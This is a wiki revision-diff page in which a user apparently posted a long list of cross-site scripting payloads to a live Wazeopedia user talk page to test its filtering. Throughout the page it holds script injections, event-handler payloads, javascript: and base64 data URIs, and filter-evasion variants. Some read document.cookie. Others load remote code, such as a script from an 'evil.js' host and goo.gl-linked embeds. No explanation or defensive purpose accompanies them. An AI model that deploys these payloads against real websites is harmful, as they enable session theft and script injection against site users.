Difference between revisions of "User talk:Evanricafort"

From Wazeopedia
(Created page with "“/></a></><img src=1.gif onerror=alert(document.cookie)> </script>">'><script>prompt(String.fromCharCode(88.83.83))</script> "><option>"><button>img src=x onerror=alert(/xss...")
 
Line 1: Line 1:
/></a></><img src=1.gif onerror=alert(document.cookie)>
+
<script>type="text/javascript">alert ('Xss')</script>
</script>">'><script>prompt(String.fromCharCode(88.83.83))</script>
+
"><img src=x onerror=confirm('xss by evan');>
"><option>"><button>img src=x onerror=alert(/xss/);></button></option>
+
"><script>alert(String.fromCharCode(88, 83, 83, 32, 98, 121, 32, 69, 118, 97, 110, 95, 80, 111, 112, 117, 112))</script>
</title><script>alert(/xss/)</script>
+
"><script x src=//0x.lv?</style></script><script>alert(String.fromCharCode(120, 115, 115, 32, 98, 121, 32, 101, 118, 97, 110 ))</script>
'"><script>alert(document.domain)</script>
+
"><IMG SRC=javascript:alert("XSS")>
"><iframe onclick=alert(Evan)></iframe>
+
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
</textarea>"><script>prompt(Evan)</script>
+
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
//>'>"><img src=x onerror=prompt(Evan);>
+
<IMG onmouseover="alert('xxs')">
"><img src=x onerror=prompt(1)>.asd.asd
+
<IMG SRC="jav&#x0A;ascript:alert('XSS');">
'"()&%1<ScRiPt >prompt(963191)</ScRiPt>
+
<IMG SRC="jav&#x0D;ascript:alert('XSS');">
'"--></style></script><script>alert(/xss/)</script>
+
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
"><img src=x.png onerror=prompt("XSS");>
+
<IMG SRC=" &#14;  javascript:alert('XSS');">
"><img src=x onerror=prompt(1);>
+
javascript:alert("XSS")
<img src=x onerror=alert(0)>
+
"><img src=x onerror=prompt(0);>
"><script>prompt(1)</script>
+
"><img src=x onerror=prompt("xss/by/evan")>
"/><script>alert(document.cookie);</script>
+
"><A HREF="http://www.google.com"><h1>Robinhood:0x00</h1></A>
"><IMG SRC=# onmouseover="alert('xss')">
+
";confirm('XSS')//244
<svg onload="prompt(/xss by evan/);">
+
'+prompt(0)+'
#!prettyPhoto/<a onclick="alert(/XSS by Evan/);">/  
+
</SCRIPT>">'><SCRIPT>alert(88,83,83))</SCRIPT>
<IMG SRC="jalert('XSS');">
+
<ScRipt>prompt(0)</ScRiPt>
<IMG SRC=jalert('XSS')>
+
"><script>alert(0)</script><"
false,false,false);});alert(1); //
+
--></style></script><script>alert(1)</script>
</title><!-- --><body onload=alert(1);></iframe src=http://google.com>-->
+
"></TITLE><SCRIPT>alert("XSS by Evan");</SCRIPT>
'"onmouseover="prompt(1)"
+
"><b onmouseover=alert('xss by evan')>XSS</b><script>alert(document.domain)</script>
"><script>alert(document.domain)</script>
+
"><img src="a" onerror="javascript:alert(document.domain)">
<script>alert(1);</script>
+
<img src=x onerror=prompt(3);
<script>prompt(1);</script>
+
"><Script>+alert('Robinhood:0x00')</script>
<script>confirm (/xss by evan/);</script>
+
"></script><svg/onload='-/"/-[Image().src=/http:\/\/shazzer.co.uk\/x/.source.replace(/\\/gi,[])]//'>
<script src="http://rhainfosec.com/evil.js">
+
"><script>location.href="data:text/html;base64,PHNjcmlwdD5hbGVydCgiY29va2llOiAiK2RvY3VtZW50LmNvb2tpZSk8L3NjcmlwdD4=#?someRandomParam1=blah&someRandomParam2=blah";</script>
<scRiPt>alert(1);</scrIPt>
+
<DIV STYLE="width:expression(alert('XSS'));">
<scr<script>ipt>alert(1)</scr<script>ipt>
+
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
<a href="rhainfosec.com" onclimbatree=alert(1)>ClickHere</a>
+
<form id="test"></form><button form="test" formaction="javascript:alert(1)">X</button>
<body/onhashchange=alert(1)><a href=#>clickit
+
<input onfocus=write(1) autofocus>
<img/src=aaa.jpg onerror=prompt(1);>
+
<input onblur=write(1) autofocus><input autofocus>
<video src=x onerror=prompt(1);>
+
<video poster=javascript:alert(1)//></video>
<audio src=x onerror=prompt(1);>
+
<body onscroll=alert(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
<iframesrc="javascript:alert(2)">
+
<form id=test onforminput=alert(1)><input></form><button form=test onformchange=alert(2)>XSS</button>
<iframe/src="data:text&sol;html;&Tab;base64&NewLine;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
+
<video><source onerror="alert(1)">
<embed/src=//goo.gl/nlX0P>
+
<video onerror="alert(1)"><source></source></video>
<form action="Javascript:alert(1)"><input type=submit>
+
<form><button formaction="javascript:alert(1)">XXS</button>
<isindex action="javascript:alert(1)" type=image>
+
<body oninput=alert(1)><input autofocus>
<isindex action=j&Tab;a&Tab;vas&Tab;c&Tab;r&Tab;ipt:alert(1) type=image>
+
<math href="javascript:alert(404)">CLICKME</math> <math> <!-- up to FF 13 --> <maction actiontype="statusline#http://google.com" xlink:href="javascript:alert(2)">CLICKME</maction> <!-- FF 14+ --> <maction actiontype="statusline" xlink:href="javascript:alert(3)">CLICKME<mtext>http://http://google.com</mtext></maction> </math>
<isindex action=data:text/html, type=image>
+
<frameset onload=alert(1)>
<formaction='data:text&sol;html,&lt;script&gt;alert(1)&lt/script&gt'><button>CLICK
+
<table background="javascript:alert(1)"></table>
<isindexformaction="javascript:alert(1)" type=image>
+
<!--<img src="--><img src=x onerror=alert(1)//">
<input type="image" formaction=JaVaScript:alert(0)>
+
<comment><img src="</comment><img src=x onerror=alert(1)//">
<form><button formaction=javascript&colon;alert(/xssbyevan/)>CLICKME
+
 
<object/data=//goo.gl/nlX0P?
+
<!-- up to Opera 11.52, FF 3.6.28 --> <![><img src="]><img src=x onerror=alert(1)//"> <!-- IE9+, FF4+, Opera 11.60+, Safari 4.0.4+, GC7+ --> <svg><![CDATA[><image xlink:href="]]><img src=xx:x onerror=alert(2)//"></svg>
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">
+
<style><img src="</style><img src=x onerror=alert(1)//">
<applet code="javascript:confirm(document.cookie);">
+
<li style=list-style:url() onerror=alert(1)></li> <div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(1)></div>
<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
+
<head><base href="javascript://"/></head><body><a href="/. /,alert(1)//#">XXX</a></body>
<svg/onload=prompt(1);>
+
<SCRIPT FOR=document EVENT=onreadystatechange>alert(1)</SCRIPT>
<marquee/onstart=confirm(2)>/
+
<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT>
<body onload=prompt(1);>
+
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
<select autofocus onfocus=alert(1)>
+
<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></embed>
<textarea autofocus onfocus=alert(1)>
+
<b <script>alert(1)//</script>0</script></b>
<keygen autofocus onfocus=alert(1)>
+
<div id="div1"><input value="``onmouseover=alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>
<video><source onerror="javascript:alert(1)">
+
<img[a][b]src=x[d]onerror[c]=[e]"alert(1)">
<q/oncut=alert(1)>
+
<a href="[a]java[b]script[c]:alert(1)">XXX</a>
<q/oncut=open()>
+
<script>({0:#0=alert/#0#/#0#(0)})</script>
<marquee<marquee/onstart=confirm(2)>/onstart=confirm(1)>
+
<script>({set/**/$($){_/**/setter=$,_=1}}).$=alert</script>
<a onmouseover="javascript:window.onerror=alert;throw 1>
+
<iframe sandbox="allow-same-origin allow-forms allow-scripts" src="http://example.org/"></iframe>
<img src=x onerror="javascript:window.onerror=alert;throw 1">
 
<a onmouseover=location=’javascript:alert(1)>click
 
<body onfocus="location='javascrpt:alert(1) >123
 
<svg><script>alert&#40/1/&#41</script>
 
<meta content="&NewLine; 1 &NewLine;;JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/>
 
<math><a xlink:href="//jsfiddle.net/t846h/">click
 
<svg><![CDATA[><imagexlink:href="]]><img/src=xx:xonerror=alert(2)//"></svg>
 
<svg xmlns:xlink="http://www.w3.org/1999/xlink"><a><circle r=100 /><animate attributeName="xlink:href" values=";javascript:alert(1)" begin="0s" dur="0.1s" fill="freeze"/>
 
<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:\u0061lert(1);"></g></svg>
 
<meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>
 
<meta http-equiv="refresh" content="0;url=//goo.gl/nlX0P">
 
" autofocusonfocus=alert(1)//
 
" onmouseover="prompt(0) x="
 
" onfocusin=alert(1) autofocus x="
 
" onfocusout=alert(1) autofocus x="
 
" onblur=alert(1) autofocus a="
 
";alert(1)//
 
"/></script><svg onload='-/"/-prompt(/xss by evan/)//'
 
"><img src=x <img src=x onerror=prompt(7)>=<img src=x onerror=prompt(7)>(1)>
 
<img src="<img src=search"/onerror=alert("xss")//">
 
"><h1 ondblclick=prompt(document.domain)>xss by evan</h1>
 
';prompt(String.fromCharCode(120,+115,+115))//\';
 
<iframe\uB\uC\uAsrc\uB\uC\uA=\uB\uC\uA "javascript:alert(1);">  
 
<><><><><><a onmouseover=prompt(1337)>XSS</a>
 
<a href="java%1B(Jscript:alert(1)">test
 
');alert(document.cookie)//
 
"></iframe><script>alert(document.cookie)</script>xss
 
'+prompt(9)+'
 
<input type="hidden" name="asdhakjshdkjashdkjashd" value="\" onload=confirm(000) />" />
 
javascript:alert(1);
 

Revision as of 02:50, 19 February 2014

<script>type="text/javascript">alert ('Xss')</script> "><img src=x onerror=confirm('xss by evan');> "><script>alert(String.fromCharCode(88, 83, 83, 32, 98, 121, 32, 69, 118, 97, 110, 95, 80, 111, 112, 117, 112))</script> "><script x src=//0x.lv?</style></script><script>alert(String.fromCharCode(120, 115, 115, 32, 98, 121, 32, 101, 118, 97, 110 ))</script> "><IMG SRC=javascript:alert("XSS")> <IMG """><SCRIPT>alert("XSS")</SCRIPT>"> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> <IMG onmouseover="alert('xxs')"> <IMG SRC="jav ascript:alert('XSS');"> <IMG SRC="jav&#x0D;ascript:alert('XSS');"> perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out <IMG SRC=" &#14; javascript:alert('XSS');"> javascript:alert("XSS") "><img src=x onerror=prompt(0);> "><img src=x onerror=prompt("xss/by/evan")>

"><A HREF="http://www.google.com">

Robinhood:0x00

</A>

";confirm('XSS')//244 '+prompt(0)+' </SCRIPT>">'><SCRIPT>alert(88,83,83))</SCRIPT> <ScRipt>prompt(0)</ScRiPt> "><script>alert(0)</script><" --></style></script><script>alert(1)</script> "></TITLE><SCRIPT>alert("XSS by Evan");</SCRIPT> ">XSS<script>alert(document.domain)</script> "><img src="a" onerror="javascript:alert(document.domain)"> <img src=x onerror=prompt(3); "><Script>+alert('Robinhood:0x00')</script> "></script><svg/onload='-/"/-[Image().src=/http:\/\/shazzer.co.uk\/x/.source.replace(/\\/gi,[])]//'> "><script>location.href="data:text/html;base64,PHNjcmlwdD5hbGVydCgiY29va2llOiAiK2RvY3VtZW50LmNvb2tpZSk8L3NjcmlwdD4=#?someRandomParam1=blah&someRandomParam2=blah";</script>

<IFRAME SRC="javascript:alert('XSS');"></IFRAME> <form id="test"></form><button form="test" formaction="javascript:alert(1)">X</button> <input onfocus=write(1) autofocus> <input onblur=write(1) autofocus><input autofocus> <video poster=javascript:alert(1)//></video> <body onscroll=alert(1)>





...



<input autofocus> <form id=test onforminput=alert(1)><input></form><button form=test onformchange=alert(2)>XSS</button>

<video>
<video onerror="alert(1)"><source>
</video>

<form><button formaction="javascript:alert(1)">XXS</button> <body oninput=alert(1)><input autofocus> <math href="javascript:alert(404)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:alert(2)">CLICKME</maction> <maction actiontype="statusline" xlink:href="javascript:alert(3)">CLICKME<mtext>http://http://google.com</mtext></maction> </math> <frameset onload=alert(1)>

<img src=x onerror=alert(1)//"> <comment><img src="</comment><img src=x onerror=alert(1)//">

<![><img src="]><img src=x onerror=alert(1)//">  <svg><![CDATA[><image xlink:href="]]><img src=xx:x onerror=alert(2)//"></svg>

<style><img src="</style><img src=x onerror=alert(1)//">

  • <head><base href="javascript://"/></head><body><a href="/. /,alert(1)//#">XXX</a></body> <SCRIPT FOR=document EVENT=onreadystatechange>alert(1)</SCRIPT> <OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT> <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object> <embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></embed> <b <script>alert(1)//</script>0</script>

    <input value="``onmouseover=alert(1)">
    <script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>

    <img[a][b]src=x[d]onerror[c]=[e]"alert(1)"> <a href="[a]java[b]script[c]:alert(1)">XXX</a> <script>({0:#0=alert/#0#/#0#(0)})</script> <script>({set/**/$($){_/**/setter=$,_=1}}).$=alert</script> <iframe sandbox="allow-same-origin allow-forms allow-scripts" src="http://example.org/"></iframe>